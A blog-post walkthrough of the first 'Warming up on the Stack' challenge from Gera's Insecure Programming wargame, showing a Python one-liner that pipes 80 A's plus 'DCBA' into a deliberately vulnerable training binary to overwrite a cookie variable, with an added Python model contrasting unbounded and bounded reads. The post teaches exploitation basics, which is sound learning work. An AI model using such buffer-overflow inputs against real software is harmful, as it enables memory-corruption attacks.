Wednesday, August 19, 2015

Gera's Insecure Programming by example: Warming up on the Stack #1 - Additional info

Welcome back!  I know I said in the last post we would cover the second challenge in the next post.  But, there's still information I want to cover to help with this series and beyond.  I'll cover the rest of the "Warming up on the stack" challenges after this post, but then cover the FireEye FLARE challenges from 2014 and the ones released in July.  This post will help us for the rest of the Gera posts as well as the FLARE posts.

This post will cover:
1.  Quick intro to Python
2.  Ways Python can be used
3.  How we can use Python to solve the first challenge

Quick intro to Python

Why are we going to cover Python?  Unfortunately, PowerShell isn't as ubiquitous as Python, which is loved on *NIX, in IDA and in so many other places.  Plus, Python is handy to know in many ways.  Remember in the last post how we had to count out all of those A's to get what we needed?  Python would have made that a whole lot easier.  We'll still go through the manual ways to achieve our goals, but we'll also integrate Python to make the same thing easier and faster.

Here's my short intro on how to learn what we need for Python:  Go here to the free Cybrary Python course.  There are many resources for learning Python on the Internet if you'd like to go somewhere else.  For this specific post, you don't need to get to the packet manipulation portion or the other advanced topics if you don't want to.  They will help you develop your skills with Python, though.

Ways Python can be used

If you went through the material above, you may have seen the ways it can be used.  If not, there are three ways in particular I want to point out.

1. Interactively in its own "shell".  Fun fact: IDA has a Python shell.









2.  We can also use it as part of a stdin/stdout pipeline.  This would be helpful to quickly do things with Python to pass along to another object in the pipeline like so:




3.  Or we can call Python scripts to do more things for us:











So many ways Python can be used.  Such fun.  Wow.

How we can use Python to solve the first challenge

It wasn't very fun typing out a lot of A's to get our answer.  Normally you would use a scripting language like Python to do that for you.  That's what we're going to do now!  We will do it like the second example above to solve the challenge.  But Brain, if we overflow it with "Hello World", won't that mess up the way we solved it like last time?  Let's recap the previous post.

There were two variables in the program, buf and cookie.  We needed to give buf an input long enough to overflow into cookie.  To solve it, we had to fill buf with 80 A's and cookie with DCBA (44434241 as hex ASCII codes).  In that post, we manually entered 80 A's and then DCBA inside GDB; those four bytes are read back as the little-endian integer 0x41424344, so the overflow set cookie correctly and we won.

Let's solve it with Python!
1.  Open up a Terminal window
2.  Browse to where the first challenge is
3.  Let's try some fun examples first.  Type in:
python -c 'print "AAAA"'

The "-c" argument to Python tells it to run a command.  Our command is a print statement that prints out "AAAA".  Now you should see:





I don't want to type out more A's than I need to.
4.  In Terminal, type in:
python -c 'print "A" * 80'

We should now see 80 A's:





5.  Almost there.  Let's see if we can just add "DCBA".  Type in:
python -c 'print "A" * 80 "DCBA"'



Oh.  We need to join those two strings with + to make one string.
6.  In Terminal, type in:
python -c 'print "A" * 80 + "DCBA"'




7.  Let's try it now as input to our program.  In Terminal, type in:
python -c 'print "A" * 80 + "DCBA"' | ./stack1



Win!

So much easier doing it this way than typing everything out!
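
The same input, modelled in Python 3 as an added example (not code from the original post or from Gera's challenge): it assumes the layout the post describes, an 80-byte buf directly followed by a 4-byte little-endian cookie, and shows why the bytes "DCBA" are read back as 0x41424344, then what a length-bounded read would have left in cookie. The function names are made up for this illustration.

```python
import struct

BUF_SIZE = 80            # size of buf, per the post
WIN_VALUE = 0x41424344   # value cookie must hold to win, per the post

def build_input(cookie_value=WIN_VALUE):
    """80 filler bytes, then the cookie value packed little-endian."""
    return b"A" * BUF_SIZE + struct.pack("<I", cookie_value)

def new_frame():
    """Assumed layout: buf[80] directly followed by a zeroed 4-byte cookie."""
    return bytearray(BUF_SIZE + 4)

def unbounded_read(frame, data):
    """gets()-style copy: stops at newline, never checks the size of buf.
    (The trailing NUL that gets() writes is left out of this model.)"""
    line = data.split(b"\n", 1)[0][:len(frame)]  # clamp to the modelled frame
    frame[:len(line)] = line

def bounded_read(frame, data):
    """fgets(buf, sizeof buf, stdin)-style copy: at most 79 bytes plus NUL."""
    line = data.split(b"\n", 1)[0][:BUF_SIZE - 1]
    frame[:len(line)] = line
    frame[len(line)] = 0

def cookie(frame):
    """Read the 4 bytes after buf the way a little-endian CPU would."""
    return struct.unpack_from("<I", frame, BUF_SIZE)[0]

if __name__ == "__main__":
    data = build_input() + b"\n"   # constructed input, same bytes as the pipeline
    print(data[-5:-1])             # the four bytes that land in cookie

    frame = new_frame()
    unbounded_read(frame, data)
    print("unbounded read: cookie = 0x%08x" % cookie(frame))

    frame = new_frame()
    bounded_read(frame, data)
    print("bounded read:   cookie = 0x%08x" % cookie(frame))
```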
